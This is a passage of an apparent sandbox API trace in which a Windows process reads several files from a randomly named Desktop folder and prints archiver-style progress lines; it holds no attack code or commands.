lpWideCharStr="moG2C7rzW\\q4vqwq7Oz6niAh.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0063.079] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\q4vqwq7Oz6niAh.png", cchWideChar=28, lpMultiByteStr=0x1c82010, cbMultiByte=28, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="moG2C7rzW\\q4vqwq7Oz6niAh.png \r", lpUsedDefaultChar=0x22e760) returned 28 [0063.079] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.108] fputs (in: _Str=" 44% 22 + moG2C7rzW\\q4vqwq7Oz6niAh.png", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.109] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.109] free (_Block=0x1c84eb0) [0063.109] malloc (_Size=0x58) returned 0x1c87f88 [0063.110] malloc (_Size=0x8) returned 0x1c80c00 [0063.110] malloc (_Size=0x86) returned 0x1c89330 [0063.110] free (_Block=0x1c80c00) [0063.110] malloc (_Size=0x86) returned 0x1c893c0 [0063.110] free (_Block=0x1c89330) [0063.110] malloc (_Size=0xc) returned 0x1c897f8 [0063.110] malloc (_Size=0x86) returned 0x1c89330 [0063.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\q4vqwq7Oz6niAh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\q4vqwq7oz6niah.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.110] free (_Block=0x1c893c0) [0063.110] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x8241, lpOverlapped=0x0) returned 1 [0063.113] SetEvent (hEvent=0xd4) returned 1 [0063.113] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.113] GetTickCount () returned 0x11473ba [0063.113] strcmp (_Str1="+", _Str2="+") returned 0 [0063.113] wcscmp (_String1="moG2C7rzW\\q4vqwq7Oz6niAh.png", _String2="moG2C7rzW\\q4vqwq7Oz6niAh.png") returned 0 [0063.114] strlen (_Str="45") returned 0x2 [0063.114] strcmp (_Str1=" 45%", _Str2=" 44%") returned 1 [0063.114] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\q4vqwq7Oz6niAh.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0063.114] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\q4vqwq7Oz6niAh.png", cchWideChar=28, lpMultiByteStr=0x1c82010, cbMultiByte=28, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\q4vqwq7Oz6niAh.png \r", lpUsedDefaultChar=0x22e868) returned 28 [0063.114] strcmp (_Str1=" 44% 22 + moG2C7rzW\\q4vqwq7Oz6niAh.png", _Str2=" 45% 22 + moG2C7rzW\\q4vqwq7Oz6niAh.png") returned -1 [0063.114] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.115] fputs (in: _Str=" 45% 22 + moG2C7rzW\\q4vqwq7Oz6niAh.png", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.116] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.116] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.116] free (_Block=0x1c89330) [0063.116] free (_Block=0x1c897f8) [0063.116] CloseHandle (hObject=0xe8) returned 1 [0063.116] free (_Block=0x1c87f88) [0063.117] SetEvent (hEvent=0xd4) returned 1 [0063.117] free (_Block=0x1c897e0) [0063.117] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.118] free (_Block=0x1c83ec0) [0063.118] free (_Block=0x1c86288) [0063.118] free (_Block=0x1c82e80) [0063.119] free (_Block=0x0) [0063.119] free (_Block=0x0) [0063.119] free (_Block=0x0) [0063.119] malloc (_Size=0x8) returned 0x1c83ec0 [0063.119] malloc (_Size=0x3a) returned 0x1c84eb0 [0063.119] free (_Block=0x1c83ec0) [0063.119] malloc (_Size=0xc) returned 0x1c87d80 [0063.119] malloc (_Size=0x3a) returned 0x1c84e68 [0063.119] free (_Block=0x1c84eb0) [0063.119] free (_Block=0x27fbf0) [0063.119] free (_Block=0x27fbe0) [0063.119] free (_Block=0x27fb60) [0063.119] free (_Block=0x1c85bb8) [0063.119] GetTickCount () returned 0x11473ba [0063.119] malloc (_Size=0x60) returned 0x1c85bb8 [0063.119] free (_Block=0x0) [0063.119] malloc (_Size=0x1) returned 0x27fb60 [0063.119] free (_Block=0x0) [0063.119] malloc (_Size=0x4) returned 0x27fbe0 [0063.119] free (_Block=0x0) [0063.120] malloc (_Size=0x8) returned 0x27fbf0 [0063.120] malloc (_Size=0x18) returned 0x1c86288 [0063.120] malloc (_Size=0x74) returned 0x1c89330 [0063.120] realloc (_Block=0x0, _Size=0xa) returned 0x1c897e0 [0063.120] strlen (_Str="45") returned 0x2 [0063.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Rg_8VLCBiVD.csv", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0063.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Rg_8VLCBiVD.csv", cchWideChar=25, lpMultiByteStr=0x1c82010, cbMultiByte=25, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="moG2C7rzW\\Rg_8VLCBiVD.csv \r", lpUsedDefaultChar=0x22e760) returned 25 [0063.120] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.121] fputs (in: _Str=" 45% 23 + moG2C7rzW\\Rg_8VLCBiVD.csv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.122] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.122] free (_Block=0x1c88500) [0063.122] malloc (_Size=0x58) returned 0x1c87f88 [0063.122] malloc (_Size=0x8) returned 0x1c83ec0 [0063.122] malloc (_Size=0x80) returned 0x1c893b0 [0063.122] free (_Block=0x1c83ec0) [0063.122] malloc (_Size=0x80) returned 0x1c865f0 [0063.122] free (_Block=0x1c893b0) [0063.122] malloc (_Size=0xc) returned 0x1c89828 [0063.122] malloc (_Size=0x80) returned 0x1c893b0 [0063.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Rg_8VLCBiVD.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\rg_8vlcbivd.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.123] free (_Block=0x1c865f0) [0063.123] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x17051, lpOverlapped=0x0) returned 1 [0063.126] SetEvent (hEvent=0xd4) returned 1 [0063.126] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.185] GetTickCount () returned 0x11473f8 [0063.186] strcmp (_Str1="+", _Str2="+") returned 0 [0063.186] wcscmp (_String1="moG2C7rzW\\Rg_8VLCBiVD.csv", _String2="moG2C7rzW\\Rg_8VLCBiVD.csv") returned 0 [0063.186] strlen (_Str="48") returned 0x2 [0063.186] strcmp (_Str1=" 48%", _Str2=" 45%") returned 1 [0063.186] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Rg_8VLCBiVD.csv", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0063.186] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Rg_8VLCBiVD.csv", cchWideChar=25, lpMultiByteStr=0x1c82010, cbMultiByte=25, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\Rg_8VLCBiVD.csv \r", lpUsedDefaultChar=0x22e868) returned 25 [0063.186] strcmp (_Str1=" 45% 23 + moG2C7rzW\\Rg_8VLCBiVD.csv", _Str2=" 48% 23 + moG2C7rzW\\Rg_8VLCBiVD.csv") returned -1 [0063.186] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.187] fputs (in: _Str=" 48% 23 + moG2C7rzW\\Rg_8VLCBiVD.csv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.188] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.188] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.188] free (_Block=0x1c893b0) [0063.188] free (_Block=0x1c89828) [0063.188] CloseHandle (hObject=0xe8) returned 1 [0063.188] free (_Block=0x1c87f88) [0063.189] SetEvent (hEvent=0xd4) returned 1 [0063.189] free (_Block=0x1c89810) [0063.189] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.194] malloc (_Size=0xe8) returned 0x1c865f0 [0063.195] wcscmp (_String1="moG2C7rzW\\Rg_8VLCBiVD.csv", _String2="moG2C7rzW\\Rg_8VLCBiVD.csv") returned 0 [0063.195] strlen (_Str="48") returned 0x2 [0063.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Rg_8VLCBiVD.csv", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0063.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Rg_8VLCBiVD.csv", cchWideChar=25, lpMultiByteStr=0x1c82010, cbMultiByte=25, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="moG2C7rzW\\Rg_8VLCBiVD.csv \r", lpUsedDefaultChar=0x22e9a8) returned 25 [0063.195] strcmp (_Str1=" 48% 23 + moG2C7rzW\\Rg_8VLCBiVD.csv", _Str2=" 48% 24 + moG2C7rzW\\Rg_8VLCBiVD.csv") returned -1 [0063.195] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.196] fputs (in: _Str=" 48% 24 + moG2C7rzW\\Rg_8VLCBiVD.csv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.197] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.197] malloc (_Size=0x60) returned 0x1c85bb8 [0063.197] free (_Block=0x0) [0063.197] malloc (_Size=0x1) returned 0x27fb60 [0063.197] free (_Block=0x0) [0063.197] malloc (_Size=0x4) returned 0x27fbe0 [0063.197] free (_Block=0x0) [0063.197] malloc (_Size=0x8) returned 0x27fbf0 [0063.197] malloc (_Size=0x18) returned 0x1c86248 [0063.197] ResetEvent (hEvent=0xd0) returned 1 [0063.197] ResetEvent (hEvent=0xd4) returned 1 [0063.197] ResetEvent (hEvent=0xd8) returned 1 [0063.197] malloc (_Size=0x20) returned 0x1c82e80 [0063.197] realloc (_Block=0x0, _Size=0xa) returned 0x1c89810 [0063.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\3Ys6XUI1zSfF0RejyCi.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\3ys6xui1zsff0rejyci.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.198] free (_Block=0x1c893b0) [0063.198] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xefbc, lpOverlapped=0x0) returned 1 [0063.200] SetEvent (hEvent=0xd4) returned 1 [0063.200] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.201] GetTickCount () returned 0x1147408 [0063.201] strcmp (_Str1="+", _Str2="+") returned 0 [0063.201] strlen (_Str="50") returned 0x2 [0063.201] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\3Ys6XUI1zSfF0RejyCi.pps", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0063.201] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\3Ys6XUI1zSfF0RejyCi.pps", cchWideChar=41, lpMultiByteStr=0x1c82010, cbMultiByte=41, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\Vh5MbuS\\3Ys6XUI1zSfF0RejyCi.pps \r", lpUsedDefaultChar=0x22e868) returned 41 [0063.201] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.202] fputs (in: _Str=" 50% 24 + moG2C7rzW\\Vh5MbuS\\3Ys6XUI1zSfF0RejyCi.pps", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.203] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.203] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.203] free (_Block=0x1c88fe8) [0063.203] free (_Block=0x1c89858) [0063.203] CloseHandle (hObject=0xe8) returned 1 [0063.203] free (_Block=0x1c87f20) [0063.203] SetEvent (hEvent=0xd4) returned 1 [0063.203] free (_Block=0x1c89840) [0063.203] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.205] free (_Block=0x1c89da8) [0063.205] free (_Block=0x1c863a8) [0063.205] free (_Block=0x1c82e80) [0063.205] free (_Block=0x0) [0063.205] free (_Block=0x0) [0063.206] free (_Block=0x0) [0063.206] malloc (_Size=0x8) returned 0x1c89da8 [0063.206] malloc (_Size=0x54) returned 0x1c87f20 [0063.206] free (_Block=0x1c89da8) [0063.206] malloc (_Size=0xc) returned 0x1c89810 [0063.206] malloc (_Size=0x54) returned 0x1c87f80 [0063.206] free (_Block=0x1c87f20) [0063.206] free (_Block=0x27fbf0) [0063.206] free (_Block=0x27fbe0) [0063.206] free (_Block=0x27fb60) [0063.206] free (_Block=0x1c85bb8) [0063.206] GetTickCount () returned 0x1147417 [0063.206] malloc (_Size=0x60) returned 0x1c85bb8 [0063.206] free (_Block=0x0) [0063.206] malloc (_Size=0x1) returned 0x27fb60 [0063.206] free (_Block=0x0) [0063.206] malloc (_Size=0x4) returned 0x27fbe0 [0063.206] free (_Block=0x0) [0063.206] malloc (_Size=0x8) returned 0x27fbf0 [0063.206] malloc (_Size=0x18) returned 0x1c863a8 [0063.206] ResetEvent (hEvent=0xd0) returned 1 [0063.206] ResetEvent (hEvent=0xd4) returned 1 [0063.206] ResetEvent (hEvent=0xd8) returned 1 [0063.206] malloc (_Size=0x20) returned 0x1c82e80 [0063.207] realloc (_Block=0x0, _Size=0xa) returned 0x1c89840 [0063.207] strlen (_Str="50") returned 0x2 [0063.207] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.207] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", cchWideChar=33, lpMultiByteStr=0x1c82010, cbMultiByte=33, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a \r", lpUsedDefaultChar=0x22e760) returned 33 [0063.207] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.208] fputs (in: _Str=" 50% 25 + moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.209] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.209] free (_Block=0x1c88fe8) [0063.209] malloc (_Size=0x58) returned 0x1c87f20 [0063.209] malloc (_Size=0x8) returned 0x1c89dd8 [0063.209] malloc (_Size=0x90) returned 0x1c88fe8 [0063.209] free (_Block=0x1c89dd8) [0063.209] malloc (_Size=0x90) returned 0x1c893b0 [0063.209] free (_Block=0x1c88fe8) [0063.209] malloc (_Size=0xc) returned 0x1c89888 [0063.209] malloc (_Size=0x90) returned 0x1c88fe8 [0063.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\bqzsk5g-r9y.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.209] free (_Block=0x1c893b0) [0063.209] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x129b0, lpOverlapped=0x0) returned 1 [0063.212] SetEvent (hEvent=0xd4) returned 1 [0063.212] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.212] GetTickCount () returned 0x1147417 [0063.212] strcmp (_Str1="+", _Str2="+") returned 0 [0063.212] wcscmp (_String1="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", _String2="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a") returned 0 [0063.212] strlen (_Str="53") returned 0x2 [0063.212] strcmp (_Str1=" 53%", _Str2=" 50%") returned 1 [0063.212] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.212] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", cchWideChar=33, lpMultiByteStr=0x1c82010, cbMultiByte=33, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a \r", lpUsedDefaultChar=0x22e868) returned 33 [0063.213] strcmp (_Str1=" 50% 25 + moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", _Str2=" 53% 25 + moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a") returned -1 [0063.213] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.213] fputs (in: _Str=" 53% 25 + moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.214] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.215] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.215] free (_Block=0x1c88fe8) [0063.215] free (_Block=0x1c89888) [0063.215] CloseHandle (hObject=0xe8) returned 1 [0063.215] free (_Block=0x1c87f20) [0063.215] SetEvent (hEvent=0xd4) returned 1 [0063.215] free (_Block=0x1c89870) [0063.215] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.218] free (_Block=0x1c89dc8) [0063.218] free (_Block=0x1c86448) [0063.218] free (_Block=0x1c82e80) [0063.218] free (_Block=0x0) [0063.218] free (_Block=0x0) [0063.219] free (_Block=0x0) [0063.219] malloc (_Size=0x8) returned 0x1c89dc8 [0063.219] malloc (_Size=0x44) returned 0x1c87f20 [0063.219] free (_Block=0x1c89dc8) [0063.219] malloc (_Size=0x25) returned 0x1c836a0 [0063.219] wcscmp (_String1="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", _String2="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a") returned 0 [0063.219] strlen (_Str="53") returned 0x2 [0063.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", cchWideChar=33, lpMultiByteStr=0x1c82010, cbMultiByte=33, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a \r", lpUsedDefaultChar=0x22e9a8) returned 33 [0063.219] strcmp (_Str1=" 53% 25 + moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", _Str2=" 53% 26 + moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a") returned -1 [0063.219] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.220] fputs (in: _Str=" 53% 26 + moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.222] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.222] malloc (_Size=0x60) returned 0x1c85bb8 [0063.222] free (_Block=0x0) [0063.222] malloc (_Size=0x1) returned 0x27fb60 [0063.222] free (_Block=0x0) [0063.222] malloc (_Size=0x4) returned 0x27fbe0 [0063.222] free (_Block=0x0) [0063.222] malloc (_Size=0x8) returned 0x27fbf0 [0063.222] malloc (_Size=0x18) returned 0x1c86448 [0063.222] ResetEvent (hEvent=0xd0) returned 1 [0063.222] ResetEvent (hEvent=0xd4) returned 1 [0063.222] ResetEvent (hEvent=0xd8) returned 1 [0063.222] malloc (_Size=0x20) returned 0x1c82e58 [0063.222] realloc (_Block=0x0, _Size=0xa) returned 0x1c89870 [0063.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\uP-NbOmTzAJhw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\up-nbomtzajhw.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.223] free (_Block=0x1c89678) [0063.223] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x6ab1, lpOverlapped=0x0) returned 1 [0063.225] SetEvent (hEvent=0xd4) returned 1 [0063.225] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.225] GetTickCount () returned 0x1147427 [0063.225] strcmp (_Str1="+", _Str2="+") returned 0 [0063.225] strlen (_Str="54") returned 0x2 [0063.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\uP-NbOmTzAJhw.mp4", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0063.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\uP-NbOmTzAJhw.mp4", cchWideChar=35, lpMultiByteStr=0x1c82010, cbMultiByte=35, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\Vh5MbuS\\uP-NbOmTzAJhw.mp4 \r", lpUsedDefaultChar=0x22e868) returned 35 [0063.225] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.226] fputs (in: _Str=" 54% 26 + moG2C7rzW\\Vh5MbuS\\uP-NbOmTzAJhw.mp4", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.227] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.227] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.227] free (_Block=0x1c895d8) [0063.227] free (_Block=0x1c898b8) [0063.227] CloseHandle (hObject=0xe8) returned 1 [0063.228] free (_Block=0x1c87f20) [0063.228] SetEvent (hEvent=0xd4) returned 1 [0063.228] free (_Block=0x1c898a0) [0063.228] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.229] free (_Block=0x1c89de8) [0063.229] free (_Block=0x1c86468) [0063.229] free (_Block=0x1c82e58) [0063.229] free (_Block=0x0) [0063.229] free (_Block=0x0) [0063.229] free (_Block=0x0) [0063.229] malloc (_Size=0x8) returned 0x1c89de8 [0063.229] malloc (_Size=0x48) returned 0x1c87f20 [0063.229] free (_Block=0x1c89de8) [0063.229] malloc (_Size=0xc) returned 0x1c89870 [0063.229] malloc (_Size=0x48) returned 0x1c86570 [0063.229] free (_Block=0x1c87f20) [0063.229] free (_Block=0x27fbf0) [0063.229] free (_Block=0x27fbe0) [0063.229] free (_Block=0x27fb60) [0063.229] free (_Block=0x1c85bb8) [0063.230] GetTickCount () returned 0x1147427 [0063.230] malloc (_Size=0x60) returned 0x1c85bb8 [0063.230] free (_Block=0x0) [0063.230] malloc (_Size=0x1) returned 0x27fb60 [0063.230] free (_Block=0x0) [0063.230] malloc (_Size=0x4) returned 0x27fbe0 [0063.230] free (_Block=0x0) [0063.230] malloc (_Size=0x8) returned 0x27fbf0 [0063.230] malloc (_Size=0x18) returned 0x1c86468 [0063.230] ResetEvent (hEvent=0xd0) returned 1 [0063.230] ResetEvent (hEvent=0xd4) returned 1 [0063.230] ResetEvent (hEvent=0xd8) returned 1 [0063.230] malloc 